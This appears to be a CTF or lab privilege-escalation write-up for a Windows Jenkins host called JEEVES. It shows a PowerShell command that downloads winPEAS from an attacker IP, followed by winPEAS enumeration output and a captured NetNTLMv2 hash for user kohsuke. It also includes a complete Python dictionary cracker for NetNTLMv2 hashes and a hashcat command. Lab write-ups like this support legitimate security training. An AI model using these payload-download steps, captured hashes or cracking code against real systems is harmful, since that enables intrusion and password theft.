PEAS
c:\Users\Administrator\.jenkins\tmp> cmd /c powershell -c "iwr -Uri http://10.10.16.8/winPEASany.exe -Outfile C:\Users\Administrator\.jenkins\tmp\winPEASany.exe"
Delivery complete. Executing PEAS.
CVEs
ENV
╔══════════╣ User Environment Variables
╚ Check for some passwords or keys in the env variables
computername: JEEVES
public: C:\Users\Public
localappdata: C:\Users\kohsuke\AppData\Local
psmodulepath: %ProgramFiles%\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
processor_architecture: AMD64
path: C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\
commonprogramfiles(x86): C:\Program Files (x86)\Common Files
programfiles(x86): C:\Program Files (x86)
processor_level: 6
programfiles: C:\Program Files
userprofile: C:\Users\kohsuke
systemroot: C:\Windows
os: Windows_NT
allusersprofile: C:\ProgramData
programdata: C:\ProgramData
processor_revision: 5507
username: kohsuke
commonprogramw6432: C:\Program Files\Common Files
commonprogramfiles: C:\Program Files\Common Files
onedrive: C:\Users\kohsuke\OneDrive
winsw_executable: C:\Users\Administrator\.jenkins\jenkins.exe
jenkins_home: C:\Users\Administrator\.jenkins
pathext: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
processor_identifier: Intel64 Family 6 Model 85 Stepping 7, GenuineIntel
comspec: C:\Windows\system32\cmd.exe
service_id: jenkins
prompt: $P$G
systemdrive: C:
temp: C:\Users\kohsuke\AppData\Local\Temp
winsw_service_id: jenkins
number_of_processors: 1
appdata: C:\Users\kohsuke\AppData\Roaming
tmp: C:\Users\kohsuke\AppData\Local\Temp
programw6432: C:\Program Files
windir: C:\Windows
userdomain: JEEVES
base: C:\Users\Administrator\.jenkins
╔══════════╣ System Environment Variables
╚ Check for some passwords or keys in the env variables
comspec: C:\Windows\system32\cmd.exe
os: Windows_NT
path: C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\
pathext: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
processor_architecture: AMD64
psmodulepath: C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
temp: C:\Windows\TEMP
tmp: C:\Windows\TEMP
username: SYSTEM
windir: C:\Windows
number_of_processors: 1
processor_level: 6
processor_identifier: Intel64 Family 6 Model 85 Stepping 7, GenuineIntel
processor_revision: 5507
LAPS
LSA Protection
Credentials Guard
Cached Creds
UAC
PowerShell
5.0.10586.672
NTLM
kohsuke::JEEVES:1122334455667788:a45ac2b615ebe3f4ace9153e1575e0eb:010100000000000061e2e7128a24da013d527765f2f45e370000000008003000300000000000000000000000003000008a53d0e3a444db6b709f496ae7b7c1ab0f66f58f4487df900f61ac17ee1037fd0a00100000000000000000000000000000000000090000000000000000000000
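The line above is what winPEAS's NTLM check produces: a NetNTLMv2 response for the current user computed against the fixed server challenge 1122334455667788 that is visible in the line, written in hashcat mode 5600 layout (user::domain:challenge:NTProofStr:blob). It can be cracked offline because NTProofStr depends only on the password, user name, domain, challenge and blob. The example below is added here and is not winPEAS, hashcat or the page's own code: it carries that derivation through in Python so a candidate password can be checked against such a line, which is exactly what `hashcat -m 5600` does at scale. The password "Winter2023!", the short wordlist and the demo challenge/blob are constructed test data; MD4 is implemented by hand because `hashlib`'s md4 is frequently disabled under OpenSSL 3.

```python
"""Check candidate passwords against a NetNTLMv2 line (hashcat -m 5600 format).

Added example, not winPEAS or hashcat code.  Derivation (MS-NLMP):
  NThash      = MD4(UTF16LE(password))
  NTLMv2Hash  = HMAC-MD5(NThash, UTF16LE(upper(user) + domain))
  NTProofStr  = HMAC-MD5(NTLMv2Hash, ServerChallenge || Blob)
"""
import hashlib
import hmac
import struct
from typing import Iterable, Optional

MASK32 = 0xFFFFFFFF


def _md4(data: bytes) -> bytes:
    """MD4 per RFC 1320 (little-endian words, 3 rounds of 16 steps)."""
    def f(x, y, z): return (x & y) | (~x & z)
    def g(x, y, z): return (x & y) | (x & z) | (y & z)
    def h(x, y, z): return x ^ y ^ z
    def rotl(x, n): return ((x << n) | (x >> (32 - n))) & MASK32

    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)

    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    k2 = [(i % 4) * 4 + i // 4 for i in range(16)]  # 0,4,8,12,1,5,9,13,...
    k3 = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(16):  # round 1; registers rotate so 'a' is always the one updated
            a = rotl((a + f(b, c, d) + x[i]) & MASK32, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 2
            a = rotl((a + g(b, c, d) + x[k2[i]] + 0x5A827999) & MASK32, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 3
            a = rotl((a + h(b, c, d) + x[k3[i]] + 0x6ED9EBA1) & MASK32, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a, b, c, d = (a + aa) & MASK32, (b + bb) & MASK32, (c + cc) & MASK32, (d + dd) & MASK32
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    """NTOWFv1: MD4 over the UTF-16LE password."""
    return _md4(password.encode("utf-16-le"))


def ntlmv2_key(password: str, user: str, domain: str) -> bytes:
    """NTOWFv2: user is upper-cased, domain is used as written in the line."""
    ident = (user.upper() + domain).encode("utf-16-le")
    return hmac.new(nt_hash(password), ident, hashlib.md5).digest()


def parse_5600(line: str):
    """Split user::domain:challenge:NTProofStr:blob into typed fields."""
    user, _, domain, challenge, proof, blob = line.strip().split(":", 5)
    return user, domain, bytes.fromhex(challenge), bytes.fromhex(proof), bytes.fromhex(blob)


def check_password(line: str, candidate: str) -> bool:
    """True if candidate reproduces the NTProofStr carried in the line."""
    user, domain, challenge, proof, blob = parse_5600(line)
    expected = hmac.new(ntlmv2_key(candidate, user, domain), challenge + blob, hashlib.md5).digest()
    return hmac.compare_digest(expected, proof)


def crack(line: str, wordlist: Iterable[str]) -> Optional[str]:
    """Dictionary attack: first word that verifies, else None."""
    for word in wordlist:
        if check_password(line, word):
            return word
    return None


def forge_5600(user: str, domain: str, password: str, challenge: bytes, blob: bytes) -> str:
    """Build a 5600 line for a known password (used to make constructed test data)."""
    proof = hmac.new(ntlmv2_key(password, user, domain), challenge + blob, hashlib.md5).digest()
    return f"{user}::{domain}:{challenge.hex()}:{proof.hex()}:{blob.hex()}"


# Constructed demo inputs (winPEAS's fixed challenge; a minimal NTLMv2 blob with
# zero timestamp, a fixed client nonce and an empty AV-pair list).
DEMO_CHALLENGE = bytes.fromhex("1122334455667788")
DEMO_BLOB = b"\x01\x01" + b"\x00" * 6 + b"\x00" * 8 + bytes.fromhex("3d527765f2f45e37") + b"\x00" * 12

if __name__ == "__main__":
    demo = forge_5600("kohsuke", "JEEVES", "Winter2023!", DEMO_CHALLENGE, DEMO_BLOB)
    print(demo)
    print(crack(demo, ["123456", "jenkins", "Winter2023!"]))  # Winter2023!
```

For a real capture, paste the winPEAS line into a file and run `hashcat -m 5600 hash.txt wordlist.txt`; the check above is the same computation hashcat performs per candidate.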
Printers
╔══════════╣ Enumerating Printers (WMI)
name: Microsoft XPS Document Writer
status: Unknown
sddl: O:SYD:(A;OIIO;GA;;;CO)(A;OIIO;GA;;;AC)(A;;SWRC;;;WD)(A;CIIO;GX;;;WD)(A;;SWRC;;;AC)(A;CIIO;GX;;;AC)(A;;LCSWDTSDRCWDWO;;;BA)(A;OICIIO;GA;;;BA)
is default: False
is network printer: False
=================================================================================================
name: Microsoft Print to PDF
status: Unknown
sddl: O:SYD:(A;OIIO;GA;;;CO)(A;OIIO;GA;;;AC)(A;;SWRC;;;WD)(A;CIIO;GX;;;WD)(A;;SWRC;;;AC)(A;CIIO;GX;;;AC)(A;;LCSWDTSDRCWDWO;;;BA)(A;OICIIO;GA;;;BA)
is default: False
is network printer: False
=================================================================================================
name: HPF75421 (HP ENVY 4500 series)
status: Degraded
sddl: O:SYD:(A;;LCSWSDRCWDWO;;;S-1-5-21-2851396806-8246019-2289784878-1000)(A;OIIO;RPWPSDRCWDWO;;;S-1-5-21-2851396806-8246019-2289784878-1000)(A;OIIO;GA;;;CO)(A;OIIO;GA;;;AC)(A;;SWRC;;;WD)(A;CIIO;GX;;;WD)(A;;SWRC;;;AC)(A;CIIO;GX;;;AC)(A;;LCSWDTSDRCWDWO;;;BA)(A;OICIIO;GA;;;BA)
is default: True
is network printer: False
=================================================================================================
name: Fax
status: Unknown
sddl: O:SYD:(A;OIIO;GA;;;CO)(A;OIIO;GA;;;AC)(A;;SWRC;;;WD)(A;CIIO;GX;;;WD)(A;;SWRC;;;AC)(A;CIIO;GX;;;AC)(A;;LCSWDTSDRCWDWO;;;BA)(A;OICIIO;GA;;;BA)
is default: False
is network printer: False
=================================================================================================
For the spoolsv.exe process
.NET
Privileges (kohsuke)
SeImpersonatePrivilege
Ever Logged Users
AutoLogon
Services
Installed Programs
Drivers
╔══════════╣ Device Drivers --Non Microsoft--
╚ Check 3rd party drivers for known vulnerabilities/rootkits. https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#vulnerable-drivers
NVIDIA nForce(TM) RAID Driver - 10.6.0.23 [NVIDIA Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\nvraid.sys
Broadcom NetXtreme II GigE - 7.4.14.0 [Broadcom Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\bxvbda.sys
VMware vSockets Service - 9.8.8.0 build-4037350 [VMware, Inc.]: \\.\GLOBALROOT\SystemRoot\system32\DRIVERS\vsock.sys
QLogic 10 GigE - 7.12.2.3 [QLogic Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\evbda.sys
VMware PCI VMCI Bus Device - 9.8.6.0 build-3966680 [VMware, Inc.]: \\.\GLOBALROOT\SystemRoot\System32\drivers\vmci.sys
Intel Matrix Storage Manager driver - 8.6.2.1019 [Intel Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\iaStorV.sys
LSI 3ware RAID Controller - WindowsBlue [LSI]: \\.\GLOBALROOT\SystemRoot\System32\drivers\3ware.sys
AHCI 1.3 Device Driver - 1.1.3.277 [Advanced Micro Devices]: \\.\GLOBALROOT\SystemRoot\System32\drivers\amdsata.sys
Storage Filter Driver - 1.1.3.277 [Advanced Micro Devices]: \\.\GLOBALROOT\SystemRoot\System32\drivers\amdxata.sys
AHCI Compatible Controller - 3.7.1540.43 [AMD Technologies Inc.]: \\.\GLOBALROOT\SystemRoot\System32\drivers\amdsbs.sys
Adaptec RAID Controller - 7.5.0.32048 [PMC-Sierra, Inc.]: \\.\GLOBALROOT\SystemRoot\System32\drivers\arcsas.sys
Intel(R) Rapid Storage Technology driver (inbox) - 13.2.0.1022 [Intel Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\iaStorAV.sys
LSI Fusion-MPT SAS Driver (StorPort) - 1.34.03.83 [LSI Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\lsi_sas.sys
Microsoft® Windows® Operating System - 10.0.10048.0 [LSI Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\lsi_sas2i.sys
Microsoft® Windows® Operating System - 10.0.10048.0 [Avago Technologies]: \\.\GLOBALROOT\SystemRoot\System32\drivers\lsi_sas3i.sys
LSI SSS PCIe/Flash Driver (StorPort) - 2.10.61.81 [LSI Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\lsi_sss.sys
MEGASAS RAID Controller Driver for Windows - 6.706.06.00 [Avago Technologies]: \\.\GLOBALROOT\SystemRoot\System32\drivers\megasas.sys
MegaRAID Software RAID - 15.02.2013.0129 [LSI Corporation, Inc.]: \\.\GLOBALROOT\SystemRoot\System32\drivers\megasr.sys
Marvell Flash Controller - 1.0.5.1016 [Marvell Semiconductor, Inc.]: \\.\GLOBALROOT\SystemRoot\System32\drivers\mvumis.sys
NVIDIA nForce(TM) SATA Driver - 10.6.0.23 [NVIDIA Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\nvstor.sys
MEGASAS RAID Controller Driver for Windows - 6.803.21.00 [LSI Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\percsas2i.sys
MEGASAS RAID Controller Driver for Windows - 6.602.12.0 [Avago Technologies]: \\.\GLOBALROOT\SystemRoot\System32\drivers\percsas3i.sys
Microsoft® Windows® Operating System - 2.60.01 [Silicon Integrated Systems Corp.]: \\.\GLOBALROOT\SystemRoot\System32\drivers\SiSRaid2.sys
Microsoft® Windows® Operating System - 6.1.6918.0 [Silicon Integrated Systems]: \\.\GLOBALROOT\SystemRoot\System32\drivers\sisraid4.sys
VIA RAID driver - 7.0.9600,6352 [VIA Technologies Inc.,Ltd]: \\.\GLOBALROOT\SystemRoot\System32\drivers\vsmraid.sys
Promise® SuperTrak EX Series - 5.1.0000.10 [Promise Technology, Inc.]: \\.\GLOBALROOT\SystemRoot\System32\drivers\stexstor.sys
VIA StorX RAID Controller Driver - 8.0.9200.8110 [VIA Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\vstxraid.sys
PMC-Sierra HBA Controller - 1.3.0.10769 [PMC-Sierra]: \\.\GLOBALROOT\SystemRoot\System32\drivers\ADP80XX.SYS
SAS/SATA Controller Media Driver - 8.0.4.0 Build 1 Media Driver (x86-64) [Hewlett-Packard Company]: \\.\GLOBALROOT\SystemRoot\System32\drivers\HpSAMD.sys
VMware PVSCSI StorPort driver (64-bit) - 1.3.8.0 build-3482537 [VMware, Inc.]: \\.\GLOBALROOT\SystemRoot\System32\drivers\pvscsi.sys
VMware Pointing USB Device Driver - 12.5.7.0 build-3574480 [VMware, Inc.]: \\.\GLOBALROOT\SystemRoot\System32\drivers\vmusbmouse.sys
VMware Raw Disk Helper Driver - 1.1.0.0 build-3625720 [VMware, Inc.]: \\.\GLOBALROOT\SystemRoot\system32\DRIVERS\vmrawdsk.sys
VMware Pointing PS/2 Device Driver - 12.5.7.0 build-3574480 [VMware, Inc.]: \\.\GLOBALROOT\SystemRoot\System32\drivers\vmmouse.sys
VMware SVGA 3D - 8.15.01.0051 - build-5479029 [VMware, Inc.]: \\.\GLOBALROOT\SystemRoot\system32\DRIVERS\vm3dmp.sys
Intel(R) Gigabit Adapter - 12.12.50.6 [Intel Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\e1i63x64.sys
VMware server memory controller - 7.4.2.0 build-5980934 [VMware, Inc.]: \\.\GLOBALROOT\SystemRoot\system32\DRIVERS\vmmemctl.sys
SMB
Networks